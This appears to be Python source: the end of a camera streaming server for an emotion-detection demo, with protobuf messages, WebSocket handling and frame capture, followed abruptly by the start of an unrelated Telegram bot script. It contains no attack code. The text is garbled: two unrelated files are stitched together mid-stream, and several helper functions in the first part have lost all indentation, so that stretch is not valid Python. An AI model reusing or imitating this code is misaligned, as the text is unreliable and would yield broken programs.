    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           reset=pb2.Reset())


def ResponseMessage(correct):
    """ClientBound Response message reporting whether a guess was correct."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           response=pb2.Response(correct=correct))


def StatsMessage(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
    """ClientBound Stats message with aggregate and per-emotion counts."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           stats=pb2.Stats(total=total, correct=correct, incorrect=incorrect, anger=anger,
                                           neutral=neutral, happiness=happiness, contempt=contempt, disgust=disgust,
                                           fear=fear, sadness=sadness, surprise=surprise))
def _parse_server_message(data):
    """Deserialize bytes into a ServerBound protobuf message."""
    msg = pb2.ServerBound()
    msg.ParseFromString(data)
    return msg


def _parse_image_capture(data):
    """Deserialize bytes into a FrameCapture protobuf message."""
    msg = pb2.FrameCapture()
    msg.ParseFromString(data)
    return msg
def _shutdown(sock):
try:
sock.shutdown(socket.SHUT_RDWR)
except OSError:
pass
def _file_content_type(path):
if path.endswith('.html'):
return 'text/html; charset=utf-8'
elif path.endswith('.js'):
return 'text/javascript; charset=utf-8'
elif path.endswith('.css'):
return 'text/css; charset=utf-8'
elif path.endswith('.png'):
return'image/png'
elif path.endswith('.jpg') or path.endswith('.jpeg'):
return'image/jpeg'
elif path.endswith('.wasm'):
return'application/wasm'
else:
return 'application/octet-stream'
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), 'assets'))
def _asset_path(path):
if path == '/':
value = os.environ.get('SERVER_INDEX_HTML')
if value is not None:
return value
path = 'index.html'
elif path[0] == '/':
path = path[1:]
asset_path = os.path.abspath(os.path.join(BASE_PATH, path))
if os.path.commonpath((BASE_PATH, asset_path)) != BASE_PATH:
return None
return asset_path
def _read_asset(path):
    """Return (content_bytes, content_type) for a served asset, or (None, None).

    Any read error (missing file, permission, ...) is treated as not-found.
    """
    resolved = _asset_path(path)
    if resolved is None:
        return None, None
    with contextlib.suppress(Exception):
        with open(resolved, 'rb') as f:
            return f.read(), _file_content_type(resolved)
    return None, None
class HTTPRequest(BaseHTTPRequestHandler):
    """Parses a raw request buffer using BaseHTTPRequestHandler's machinery.

    The handler is never attached to a real socket; only header parsing is
    used (command, path, headers).
    """

    def __init__(self, request_buf):
        # Deliberately skip BaseHTTPRequestHandler.__init__: there is no
        # connection to serve, we only want parse_request().
        stream = io.BytesIO(request_buf)
        self.rfile = stream
        self.raw_requestline = stream.readline()
        self.parse_request()
def _read_http_request(sock):
request = bytearray()
while b'\r\n\r\n' not in request:
buf = sock.recv(2048)
if not buf:
break
request.extend(buf)
return request
def _http_ok(content, content_type):
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Length: %d\r\n'
'Content-Type: %s\r\n'
'Connection: Keep-Alive\r\n\r\n'
) % (len(content), content_type)
return header.encode('ascii') + content
def _http_switching_protocols(token):
accept_token = token.encode('ascii') + b'258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
accept_token = hashlib.sha1(accept_token).digest()
header = (
'HTTP/1.1 101 Switching Protocols\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Accept: %s\r\n\r\n'
) % base64.b64encode(accept_token).decode('ascii')
return header.encode('ascii')
def _http_not_found():
return 'HTTP/1.1 404 Not Found\r\n\r\n'.encode('ascii')
@contextlib.contextmanager
def Socket(port):
    """Context manager yielding a listening TCP socket bound to all interfaces.

    The socket is shut down and closed on exit.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('', port))
    listener.listen()
    try:
        yield listener
    finally:
        _shutdown(listener)
        listener.close()
class DroppingQueue:
    """Bounded FIFO that drops new items instead of blocking when full.

    put() never blocks: when the queue is full, the item is either dropped
    or (with replace_last=True) overwrites the newest queued item.
    get() blocks until an item is available.
    """

    def __init__(self, maxsize):
        if maxsize <= 0:
            raise ValueError('Maxsize must be positive.')
        self.maxsize = maxsize
        self._items = []
        self._cond = threading.Condition(threading.Lock())

    def put(self, item, replace_last=False):
        """Enqueue item; return True when it (or a predecessor) was dropped."""
        with self._cond:
            if len(self._items) < self.maxsize:
                if not self._items:
                    # Wake one waiter; it runs once we release the lock.
                    self._cond.notify()
                self._items.append(item)
                return False  # Not dropped.
            if replace_last:
                self._items[-1] = item
                return False  # Not dropped.
            return True  # Dropped.

    def get(self):
        """Block until an item is available, then pop the oldest."""
        with self._cond:
            while not self._items:
                self._cond.wait()
            return self._items.pop(0)
class AtomicSet:
    """A set whose operations are lock-protected; iteration uses a snapshot."""

    def __init__(self):
        self._lock = threading.Lock()
        self._set = set()

    def add(self, value):
        """Insert value and return it (handy for add-and-use chaining)."""
        with self._lock:
            self._set.add(value)
        return value

    def remove(self, value):
        """Remove value; return True when it was present, False otherwise."""
        with self._lock:
            if value in self._set:
                self._set.remove(value)
                return True
            return False

    def __len__(self):
        with self._lock:
            return len(self._set)

    def __iter__(self):
        # Copy under the lock so concurrent mutation cannot break iteration.
        with self._lock:
            return iter(self._set.copy())
class PresenceServer:
    """Publishes an mDNS service entry via avahi for the lifetime of the object."""

    SERVICE_TYPE = '_aiy_vision_video._tcp'

    def __init__(self, name, port):
        logger.info('Start publishing %s on port %d.', name, port)
        args = ['avahi-publish-service', name, self.SERVICE_TYPE, str(port),
                'AIY Streaming']
        self._process = subprocess.Popen(args, shell=False)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()

    def close(self):
        """Terminate the avahi helper process and wait for it to exit."""
        self._process.terminate()
        self._process.wait()
        logger.info('Stop publishing.')
class StreamingServer:
    """Streams the camera's H.264 output to proto/web/annexb clients.

    A single background thread (_run) owns all client bookkeeping: it accepts
    new connections on three listening sockets and drains a command queue
    that client rx/tx threads post ClientCommand values onto. It also drives
    the emotion-detection frame-capture workflow.
    """
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
    def __init__(self, camera, bitrate=1000000, mdns_name=None,
                 tcp_port=4665, web_port=4664, annexb_port=4666):
        # camera must provide start_recording/stop_recording/capture_frame/
        # request_key_frame and a .resolution attribute (picamera-style API).
        self._bitrate = bitrate
        self._camera = camera
        self._clients = AtomicSet()          # All connected clients.
        self._enabled_clients = AtomicSet()  # Subset currently streaming.
        self._done = threading.Event()
        self._commands = queue.Queue()
        self._thread = threading.Thread(target=self._run,
                                        args=(mdns_name, tcp_port, web_port, annexb_port))
        self._thread.start()
    def close(self):
        """Signal the server thread to stop and wait for it to finish."""
        self._done.set()
        self._thread.join()
    def send_overlay(self, svg):
        """Forward an SVG overlay to every currently enabled client."""
        for client in self._enabled_clients:
            client.send_overlay(svg)
    def _start_recording(self):
        # The server object itself is the recording sink (see write() below).
        logger.info('Camera start recording')
        self._camera.start_recording(self, format='h264', profile='baseline',
                                     inline_headers=True, bitrate=self._bitrate, intra_period=0)
        time.sleep(.500)
        self._get_stats()
    def _stop_recording(self):
        logger.info('Camera stop recording')
        self._camera.stop_recording()
    def _get_stats(self):
        """Fetch aggregate stats from the backend and push them to enabled clients."""
        stats = emotionBackend.getStats()
        # NOTE(review): 'total'/'correct'/'incorrect' are indexed with [0]
        # while the emotion keys are not -- presumably the backend returns
        # one-element rows for the counters; confirm against emotionBackend.
        total = stats['total'][0]
        correct = stats['correct'][0]
        incorrect = stats['incorrect'][0]
        anger = stats['anger']
        neutral = stats['neutral']
        happiness = stats['happiness']
        contempt = stats['contempt']
        disgust = stats['disgust']
        fear = stats['fear']
        sadness = stats['sadness']
        surprise = stats['surprise']
        for cl in self._enabled_clients:
            cl.send_stats_message(total=total, correct=correct, incorrect=incorrect, anger=anger,
                                  neutral=neutral, happiness=happiness, contempt=contempt,
                                  disgust=disgust, fear=fear, sadness=sadness, surprise=surprise)
        logger.info('Stats sent to clients...')
    def _process_command(self, client, command):
        """Handle one ClientCommand; starts/stops recording as the enabled set changes."""
        was_streaming = bool(self._enabled_clients)
        if command is ClientCommand.ENABLE:
            self._enabled_clients.add(client)
        elif command is ClientCommand.DISABLE:
            self._enabled_clients.remove(client)
        elif command == ClientCommand.STOP:
            self._enabled_clients.remove(client)
            # Only stop clients still registered (guards against double STOP).
            if self._clients.remove(client):
                client.stop()
            logger.info('Number of active clients: %d', len(self._clients))
        elif command is ClientCommand.RESET:
            for cl in self._enabled_clients:
                cl.send_reset_message()
            logger.info('Reset command sent')
        elif command is ClientCommand.YES:
            for cl in self._enabled_clients:
                cl.send_response_message(correct=True)
            logger.info('Response sent')
        elif command is ClientCommand.NO:
            for cl in self._enabled_clients:
                cl.send_response_message(correct=False)
            logger.info('Response sent')
        elif command is ClientCommand.STATS:
            self._get_stats()
        elif command is ClientCommand.FRAME:
            for cl in self._enabled_clients:
                cl.send_processing_message()
            # Remove photos from assets/emotion_files to clear out data from previous runs
            assets_path = '/home/mendel/emotion-mesh/local-detector/streaming/assets/emotion-files/'
            sd_path = '/disk1/images/'
            for afile in os.listdir(assets_path):
                file_path = os.path.join(assets_path, afile)
                try:
                    if os.path.isfile(file_path):
                        os.unlink(file_path)
                except Exception as e:
                    logger.warning('Error removing files: ' + str(e))
            # NOTE(review): capture_frame appears to return a bare filename
            # (it is concatenated directly onto directory paths below) --
            # confirm against the camera implementation.
            captured_frame = self._camera.capture_frame()
            logger.info('Frame captured: ' + captured_frame)
            # Copy photo into cloud-detector folder
            cloud_path = '/home/mendel/emotion-mesh/cloud-detector/images/'
            copyfile(captured_frame, cloud_path + captured_frame)
            time.sleep(.500)
            # Move photo into local-detector folder
            local_path = '/home/mendel/emotion-mesh/local-detector/images/'
            os.rename(captured_frame, local_path + captured_frame)
            # Call cloud detector
            faceDictionary = perform_cloud_detection(captured_frame)
            # Save result to backend
            if not faceDictionary:
                logger.info('No faces detected. Resetting...')
            else:
                globals.last_image = os.path.splitext(captured_frame)[0]
                emotionBackend.createResult(globals.last_image, faceDictionary)
                # Call local detector
                # TODO: This requires some additional work and a TF2.0 port of an existing emotion model to work
                root_mod_file = os.path.splitext(captured_frame)[0] + '_modified.png'
                # Move modified photo into streaming/assets folder
                copyfile(cloud_path + root_mod_file, assets_path + captured_frame)
                # Move original and results files to SD Card
                logger.info('Processing complete. Moving images to SD and performing cleanup.')
                move(cloud_path + root_mod_file, sd_path)
                # Call back to client with results image and emotion model result
                for cl in self._clients:  # Send to all clients, including serial monitor
                    cl.send_detection_result(os.path.splitext(captured_frame)[0] + '.png', str(faceDictionary))
            move(cloud_path + captured_frame, sd_path)
            # Cleanup the local file
            os.remove(local_path + captured_frame)
            logger.info('Cleanup complete!')
        # Recording runs exactly while at least one client is enabled.
        is_streaming = bool(self._enabled_clients)
        if not was_streaming and is_streaming:
            self._start_recording()
        if was_streaming and not is_streaming:
            self._stop_recording()
    def _run(self, mdns_name, tcp_port, web_port, annexb_port):
        """Main server loop: accept connections and process queued commands."""
        try:
            with contextlib.ExitStack() as stack:
                logger.info('Listening on ports tcp: %d, web: %d, annexb: %d',
                            tcp_port, web_port, annexb_port)
                tcp_socket = stack.enter_context(Socket(tcp_port))
                web_socket = stack.enter_context(Socket(web_port))
                annexb_socket = stack.enter_context(Socket(annexb_port))
                if mdns_name:
                    stack.enter_context(PresenceServer(mdns_name, tcp_port))
                socks = (tcp_socket, web_socket, annexb_socket)
                while not self._done.is_set():
                    # Process available client commands.
                    try:
                        while True:
                            client, command = self._commands.get_nowait()
                            self._process_command(client, command)
                    except queue.Empty:
                        pass  # Done processing commands.
                    # Process recently connected clients.
                    rlist, _, _ = select.select(socks, [], [], 0.2)  # 200ms
                    for ready in rlist:
                        sock, addr = ready.accept()
                        name = '%s:%d' % addr
                        # Client type is determined by which port was hit.
                        if ready is tcp_socket:
                            client = ProtoClient(name, sock, self._commands, self._camera.resolution)
                        elif ready is web_socket:
                            client = WsProtoClient(name, sock, self._commands, self._camera.resolution)
                        elif ready is annexb_socket:
                            client = AnnexbClient(name, sock, self._commands)
                        logger.info('New %s connection from %s', client.TYPE, name)
                        self._clients.add(client).start()
                        logger.info('Number of active clients: %d', len(self._clients))
        finally:
            logger.info('Server is shutting own')
            if self._enabled_clients:
                self._stop_recording()
            for client in self._clients:
                client.stop()
            logger.info('Done')
    def write(self, data):
        """Called by camera thread for each compressed frame.

        Expects a single Annex-B NAL unit; fans it out to enabled clients and
        requests a key frame when any client needs to (re)sync on an SPS.
        """
        assert data[0:4] == b'\x00\x00\x00\x01'
        frame_type = data[4] & 0b00011111  # NAL unit type (low 5 bits).
        if frame_type in ALLOWED_NALS:
            states = {client.send_video(frame_type, data) for client in self._enabled_clients}
            if ClientState.ENABLED_NEEDS_SPS in states:
                logger.info('Requesting key frame')
                self._camera.request_key_frame()
class ClientLogger(logging.LoggerAdapter):
    """LoggerAdapter that prefixes every message with the client's name."""

    def process(self, msg, kwargs):
        prefixed = '[%s] %s' % (self.extra['name'], msg)
        return prefixed, kwargs
class ClientState(Enum):
    """Per-client video streaming state."""
    DISABLED = 1  # Not receiving video.
    ENABLED_NEEDS_SPS = 2  # Enabled, waiting for an SPS NAL to (re)sync the decoder.
    ENABLED = 3  # Enabled and actively receiving frames.
class ClientCommand(Enum):
    """Commands posted by client threads onto the server's command queue."""
    STOP = 1  # Disconnect and drop the client.
    ENABLE = 2  # Begin streaming video to the client.
    DISABLE = 3  # Stop streaming video to the client.
    FRAME = 4  # Capture a still frame and run detection on it.
    RESET = 5  # Broadcast a Reset message to enabled clients.
    YES = 6  # Broadcast "detection correct" feedback.
    NO = 7  # Broadcast "detection incorrect" feedback.
    STATS = 8  # Broadcast aggregate stats to enabled clients.
class Client:
    """Base class for one connected client.

    Owns a receive thread, a transmit thread and a bounded send queue.
    Subclasses implement the wire format (_send_message/_receive_message)
    and how video/overlay payloads are queued.
    """
    def __init__(self, name, sock, command_queue):
        self._lock = threading.Lock()  # Protects _state.
        self._state = ClientState.DISABLED
        self._logger = ClientLogger(logger, {'name': name})
        self._socket = sock
        self._commands = command_queue
        # Bounded queue: slow consumers drop frames instead of blocking the camera.
        self._tx_q = DroppingQueue(15)
        self._rx_thread = threading.Thread(target=self._rx_run)
        self._tx_thread = threading.Thread(target=self._tx_run)
    def start(self):
        """Start the rx and tx worker threads."""
        self._rx_thread.start()
        self._tx_thread.start()
    def stop(self):
        """Close the socket, unblock both worker threads and join them."""
        self._logger.info('Stopping...')
        _shutdown(self._socket)
        self._socket.close()
        # None is the tx thread's sentinel to exit its loop.
        self._tx_q.put(None)
        self._tx_thread.join()
        self._rx_thread.join()
        self._logger.info('Stopped.')
    def send_video(self, frame_type, data):
        """Only called by camera thread.

        Queues a video NAL according to the current state and returns the
        (possibly updated) state so the caller can request a key frame.
        """
        with self._lock:
            if self._state == ClientState.DISABLED:
                pass
            elif self._state == ClientState.ENABLED_NEEDS_SPS:
                # Only start forwarding once an SPS NAL made it into the queue.
                if frame_type == NAL.SPS:
                    dropped = self._queue_video(data)
                    if not dropped:
                        self._state = ClientState.ENABLED
            elif self._state == ClientState.ENABLED:
                dropped = self._queue_video(data)
                if dropped:
                    # Lost a frame: the decoder must resync from the next SPS.
                    self._state = ClientState.ENABLED_NEEDS_SPS
            return self._state
    def send_overlay(self, svg):
        """Can be called by any user thread."""
        with self._lock:
            if self._state != ClientState.DISABLED:
                self._queue_overlay(svg)
    def send_reset_message(self):
        """Can be called by any user thread."""
        with self._lock:
            if self._state != ClientState.DISABLED:
                self._queue_reset_message()
    def send_processing_message(self):
        """Can be called by any user thread."""
        with self._lock:
            if self._state != ClientState.DISABLED:
                self._queue_processing_message()
    def send_response_message(self, correct):
        """Can be called by any user thread."""
        with self._lock:
            if self._state != ClientState.DISABLED:
                self._queue_response_message(correct)
    def send_stats_message(self, total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
        """Can be called by any user thread."""
        with self._lock:
            if self._state != ClientState.DISABLED:
                self._queue_stats_message(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise)
    def send_detection_result(self, imagePath, emotionResult):
        """Can be called by any user thread. Sent even to disabled clients."""
        with self._lock:
            self._queue_detection_result(imagePath, emotionResult)
    def _send_command(self, command):
        # Hand a ClientCommand to the server loop for processing.
        self._commands.put((self, command))
    def _queue_message(self, message, replace_last=False):
        dropped = self._tx_q.put(message, replace_last)
        if dropped:
            self._logger.warning('Running behind, dropping messages')
        return dropped
    def _tx_run(self):
        """Transmit loop: drains the queue until the None sentinel or an error."""
        try:
            while True:
                message = self._tx_q.get()
                if message is None:
                    break
                self._send_message(message)
            self._logger.info('Tx thread finished')
        except Exception as e:
            self._logger.warning('Tx thread failed: %s', e)
        # Tx thread stops the client in any situation.
        self._send_command(ClientCommand.STOP)
    def _rx_run(self):
        """Receive loop: handles messages until clean EOF or an error."""
        try:
            while True:
                message = self._receive_message()
                if message is None:
                    break
                self._handle_message(message)
            self._logger.info('Rx thread finished')
        except Exception as e:
            self._logger.warning('Rx thread failed: %s', e)
            # Rx thread stops the client only if error happened.
            self._send_command(ClientCommand.STOP)
    def _receive_bytes(self, num_bytes):
        """Read exactly num_bytes; returns a falsy buffer on EOF."""
        received = bytearray()
        while len(received) < num_bytes:
            buf = self._socket.recv(num_bytes - len(received))
            if not buf:
                return buf  # Connection closed mid-read.
            received.extend(buf)
        return received
    def _queue_video(self, data):
        raise NotImplementedError
    def _queue_overlay(self, svg):
        raise NotImplementedError
    def _send_message(self, message):
        raise NotImplementedError
    def _receive_message(self):
        raise NotImplementedError
    def _handle_message(self, message):
        # Default: incoming messages are ignored.
        pass
class ProtoClient(Client):
    """Client speaking the length-prefixed protobuf protocol over plain TCP."""
    TYPE = 'tcp'
    def __init__(self, name, sock, command_queue, resolution):
        super().__init__(name, sock, command_queue)
        self._resolution = resolution  # Camera resolution, reported in StartMessage.
    def _queue_video(self, data):
        return self._queue_message(VideoMessage(data))
    def _queue_overlay(self, svg):
        return self._queue_message(OverlayMessage(svg))
    def _queue_reset_message(self):
        return self._queue_message(ResetMessage())
    def _queue_detection_result(self, imagePath, emotionResult):
        return self._queue_message(DetectionResultMessage(imagePath, emotionResult))
    def _queue_response_message(self, correct):
        return self._queue_message(ResponseMessage(correct))
    def _queue_stats_message(self, total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
        return self._queue_message(StatsMessage(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise))
    def _queue_processing_message(self):
        return self._queue_message(ProcessingMessage())
    def _handle_message(self, message):
        """Dispatch an incoming ServerBound message on its oneof field."""
        which = message.WhichOneof('message')
        if which == 'stream_control':
            self._handle_stream_control(message.stream_control)
        elif which == 'frame_capture':
            self._handle_frame_capture(message.frame_capture)
        elif which == 'reset':
            self._logger.info('Resetting...')
            self._send_command(ClientCommand.RESET)
        elif which == 'result_stats':
            self._logger.info('Received request for stats')
            self._send_command(ClientCommand.STATS)
        elif which == 'response':
            self._logger.info('Detection Correct: ' + str(message.response.correct))
            # Persist the user's yes/no feedback for the last captured image.
            emotionBackend.saveResponse(globals.last_image, message.response.correct)
            if (message.response.correct):
                self._send_command(ClientCommand.YES)
            else:
                self._send_command(ClientCommand.NO)
    def _handle_frame_capture(self, frame_capture):
        """Forward a frame-capture request to the server loop."""
        overlay = frame_capture.overlay
        self._logger.info('frame_capture with overlay %s', overlay)
        with self._lock:
            self._logger.info('Capturing Frame')
            self._send_command(ClientCommand.FRAME)
    def _handle_stream_control(self, stream_control):
        """Enable or disable streaming, ignoring redundant requests."""
        enabled = stream_control.enabled
        self._logger.info('stream_control %s', enabled)
        with self._lock:
            if self._state == ClientState.DISABLED and not enabled:
                self._logger.info('Ignoring stream_control disable')
            elif self._state in (ClientState.ENABLED_NEEDS_SPS, ClientState.ENABLED) and enabled:
                self._logger.info('Ignoring stream_control enable')
            else:
                if enabled:
                    self._logger.info('Enabling client')
                    self._state = ClientState.ENABLED_NEEDS_SPS
                    self._queue_message(StartMessage(self._resolution))
                    self._send_command(ClientCommand.ENABLE)
                else:
                    self._logger.info('Disabling client')
                    self._state = ClientState.DISABLED
                    # replace_last so a queued backlog cannot delay the Stop.
                    self._queue_message(StopMessage(), replace_last=True)
                    self._send_command(ClientCommand.DISABLE)
    def _send_message(self, message):
        # Wire format: 4-byte big-endian length prefix, then the serialized proto.
        buf = message.SerializeToString()
        self._socket.sendall(struct.pack('!I', len(buf)))
        self._socket.sendall(buf)
    def _receive_message(self):
        """Read one length-prefixed message; None on clean EOF."""
        buf = self._receive_bytes(4)
        if not buf:
            return None
        num_bytes = struct.unpack('!I', buf)[0]
        buf = self._receive_bytes(num_bytes)
        if not buf:
            return None
        return _parse_server_message(buf)
class WsProtoClient(ProtoClient):
    """ProtoClient variant tunneled over WebSocket.

    Before the upgrade handshake it also acts as a tiny HTTP file server for
    the bundled web assets; after the upgrade, protobuf messages travel in
    binary WebSocket frames.
    """
    TYPE = 'web'
    class WsPacket:
        """One WebSocket frame: header flags plus (unmasked) payload."""
        def __init__(self):
            self.fin = True
            self.opcode = 2  # Binary frame by default.
            self.masked = False
            self.mask = None
            self.length = 0
            self.payload = bytearray()
        def append(self, data):
            """Append payload bytes, unmasking with the frame's mask if present."""
            if self.masked:
                data = bytes([c ^ k for c, k in zip(data, cycle(self.mask))])
            self.payload.extend(data)
        def serialize(self):
            """Encode this frame for the wire (server frames are never masked)."""
            self.length = len(self.payload)
            buf = bytearray()
            b0 = 0
            b1 = 0
            if self.fin:
                b0 |= 0x80
            b0 |= self.opcode
            buf.append(b0)
            # Payload length uses 7 bits, or the 16/64-bit extended forms.
            if self.length <= 125:
                b1 |= self.length
                buf.append(b1)
            elif self.length >= 126 and self.length <= 65535:
                b1 |= 126
                buf.append(b1)
                buf.extend(struct.pack('!H', self.length))
            else:
                b1 |= 127
                buf.append(b1)
                buf.extend(struct.pack('!Q', self.length))
            if self.payload:
                buf.extend(self.payload)
            return bytes(buf)
    def __init__(self, name, sock, command_queue, resolution):
        super().__init__(name, sock, command_queue, resolution)
        self._upgraded = False  # True once the WebSocket handshake completed.
    def _receive_message(self):
        """Serve HTTP until upgraded, then reassemble WebSocket frames into messages.

        Returns a parsed ServerBound message, or None to close the connection.
        """
        try:
            if not self._upgraded:
                # True means a plain HTTP request was served; close afterwards.
                if self._process_web_request():
                    return None
                self._upgraded = True
            packets = []
            while True:
                packet = self._receive_packet()
                if packet.opcode == 0:
                    # Continuation
                    if not packets:
                        self._logger.error('Invalid continuation received')
                        return None
                    packets.append(packet)
                elif packet.opcode == 1:
                    # Text, not supported.
                    self._logger.error('Received text packet')
                    return None
                elif packet.opcode == 2:
                    # Binary.
                    packets.append(packet)
                if packet.fin:
                    # Final fragment: join all payloads and parse the proto.
                    joined = bytearray()
                    for p in packets:
                        joined.extend(p.payload)
                    return _parse_server_message(joined)
                elif packet.opcode == 8:
                    # Close.
                    self._logger.info('WebSocket close requested')
                    return None
                elif packet.opcode == 9:
                    # Ping, send pong.
                    self._logger.info('Received ping')
                    response = self.WsPacket()
                    response.opcode = 10
                    response.append(packet.payload)
                    self._queue_message(response)
                elif packet.opcode == 10:
                    # Pong. Ignore as we don't send pings.
                    self._logger.info('Dropping pong')
                else:
                    self._logger.info('Dropping opcode %d', packet.opcode)
        except Exception:
            self._logger.exception('Error while processing websocket request')
            return None
    def _receive_packet(self):
        """Read one WebSocket frame header + payload from the socket."""
        packet = self.WsPacket()
        buf = self._receive_bytes(2)
        packet.fin = buf[0] & 0x80 > 0
        packet.opcode = buf[0] & 0x0F
        packet.masked = buf[1] & 0x80 > 0
        packet.length = buf[1] & 0x7F
        # 126/127 select the 16-bit / 64-bit extended length encodings.
        if packet.length == 126:
            packet.length = struct.unpack('!H', self._receive_bytes(2))[0]
        elif packet.length == 127:
            packet.length = struct.unpack('!Q', self._receive_bytes(8))[0]
        if packet.masked:
            packet.mask = self._receive_bytes(4)
        packet.append(self._receive_bytes(packet.length))
        return packet
    def _send_message(self, message):
        """Send raw bytes as-is; wrap anything else in a binary WebSocket frame."""
        if isinstance(message, (bytes, bytearray)):
            # Raw HTTP responses queued before the upgrade.
            buf = message
        else:
            if isinstance(message, self.WsPacket):
                packet = message
            else:
                packet = self.WsPacket()
                packet.append(message.SerializeToString())
            buf = packet.serialize()
        self._socket.sendall(buf)
    def _process_web_request(self):
        """Answer one HTTP request; return True when the connection should close."""
        request = _read_http_request(self._socket)
        request = HTTPRequest(request)
        connection = request.headers['Connection']
        upgrade = request.headers['Upgrade']
        if 'Upgrade' in connection and upgrade == 'websocket':
            sec_websocket_key = request.headers['Sec-WebSocket-Key']
            self._queue_message(_http_switching_protocols(sec_websocket_key))
            self._logger.info('Upgraded to WebSocket')
            return False
        if request.command == 'GET':
            # Plain asset request: serve it, then schedule the tx thread to stop.
            content, content_type = _read_asset(request.path)
            if content is None:
                self._queue_message(_http_not_found())
            else:
                self._queue_message(_http_ok(content, content_type))
            self._queue_message(None)
            return True
        raise Exception('Unsupported request')
class AnnexbClient(Client):
    """Client receiving the raw H.264 Annex-B byte stream with no framing protocol."""
    TYPE = 'annexb'
    def __init__(self, name, sock, command_queue):
        super().__init__(name, sock, command_queue)
        # Annex-B consumers stream unconditionally: enable as soon as connected.
        self._state = ClientState.ENABLED_NEEDS_SPS
        self._send_command(ClientCommand.ENABLE)
    def _queue_video(self, data):
        # Raw NAL bytes go straight onto the tx queue, no wrapping.
        return self._queue_message(data)
    def _queue_overlay(self, svg):
        pass  # Ignore overlays.
    def _send_message(self, message):
        self._socket.sendall(message)
    def _receive_message(self):
        # This client type is write-only; any incoming payload is a protocol error.
        buf = self._socket.recv(1024)
        if not buf:
            return None
        raise RuntimeError('Invalid state.')
hub_mozita.py | #!/usr/bin/python3
import os
import json
import time
import datetime
import calendar
import telepot
import threading
import telegram_events
import tweepy as ty
from pathlib import Path
from datetime import datetime, timedelta
from configparser import ConfigParser
from telepot.loop import MessageLoop
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
# must be defined at the beginning: while refactoring variable initialization must be
# in another function
def log(stampa, err):
    """Append an entry to today's log file under ./history_mozitabot.

    Parameters
    ----------
    stampa : str
        Text to append.
    err : bool
        When True, the last getUpdates `response` is prepended for context.
    """
    global response, data_salvataggio
    if err:
        stampa = str(response) + "\n\n" + str(stampa)
    stampa = stampa + "\n--------------------\n"
    try:
        # Create the "history_mozitabot" folder on first use.
        if not os.path.exists("./history_mozitabot"):
            os.mkdir("./history_mozitabot")
    except Exception as exception_value:
        # Print only: calling log() from inside log() risked infinite recursion.
        print("Excep:22 -> " + str(exception_value))
    try:
        # Open in append mode; timestamps in entries are UTC (host clock),
        # while Italy is +1 (CET) or +2 (CEST, summer).
        with open("./history_mozitabot/log_" + str(data_salvataggio) + ".txt",
                  "a", -1, "UTF-8") as file:
            file.write(stampa)
    except Exception as exception_value:
        print("Excep:02 -> " + str(exception_value))
def load_list_from_path(generic_path):
    """Return the JSON list stored at generic_path, or [] when the file is missing."""
    p = Path(generic_path)
    # read_text closes the file; the previous bare open().read() leaked the handle.
    return json.loads(p.read_text()) if p.exists() else []
def load_dict_from_path(generic_path):
    """Return the JSON object stored at generic_path, or {} when the file is missing."""
    p = Path(generic_path)
    # read_text closes the file; the previous bare open().read() leaked the handle.
    return json.loads(p.read_text()) if p.exists() else {}
def fix_username(username):
    """Return the username guaranteed to carry a leading '@'.

    Robust to an empty string (the previous username[0] raised IndexError).
    """
    if not username.startswith("@"):
        username = "@" + username
    return username
def safe_conf_get(config_parser, section, key_name):
    """Return the value of key_name in section, or terminate the program.

    Note: despite the original docstring's claim, a missing key does NOT
    return null -- an error message is printed and the process exits.
    """
    try:
        return config_parser.get(section, key_name)
    except Exception:
        print(key_name + " non presente nella sezione " + section + "!")
        exit()
######################
# LOADING SECRETS #
######################
# Abort early when config.ini is missing (the user must rename the sample file).
if not os.path.isfile("config.ini"):
    print(
        "Il file di configurazione non è presente.\n" +
        "Rinomina il file 'config-sample.ini' in 'config.ini' e inserisci i dati mancanti.")
    exit()
# Parser holding all secret values, loaded from config.ini next to this script.
script_path = os.path.dirname(os.path.realpath(__file__))
config_parser = ConfigParser()
config_parser.read(os.path.join(script_path, "config.ini"))
# Date stamp used to name the daily log file (see log()).
localtime = datetime.now()
data_salvataggio = localtime.strftime("%Y_%m_%d")
###########################
# MANAGING BOT CONSTANTS #
###########################
TOKEN = safe_conf_get(config_parser, "bot", "TOKEN")
NEWS_CHANNEL = safe_conf_get(config_parser, "bot", "NEWS_CHANNEL")
# Invite links for the community groups, keyed by topic.
GRUPPI_URL = {
    "home": "https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ",
    "news": "https://t.me/mozItaNews",
    "developers": "https://t.me/+bv2WcZQadHZhMDE0",
    "l10n": "https://t.me/mozItaL10n",
    "design_marketing": "https://t.me/+SPpi0DHZZ8cHLZ5V"
}
# Version string and date of the last update, printed at startup.
versione = "1.6.3.1"
ultimo_aggiornamento = "27-08-2021"
print("(MozItaBot) Versione: " + versione +
      " - Aggiornamento: " + ultimo_aggiornamento)
# Load the bot's canned sentences; the file is mandatory.
if Path("frasi.json").exists():
    frasi = json.loads(open("frasi.json", encoding="utf8").read())
else:
    print("File frasi non presente.")
    exit()
# setting lists --- almost everything is merged into one single file, to avoid confusion
lists_path = "liste.json"
liste = load_dict_from_path(lists_path)
all_users_path = "all_users.json"
avvisi_on_list_path = "avvisi_on_list.json"
adminlist = []
avvisi_on_list = load_list_from_path(avvisi_on_list_path)
all_users = load_list_from_path(all_users_path)
#######################
# TWITTER INTEGRATION #
#######################
# Process start time, used to align the Twitter polling interval.
starttime = time.time()
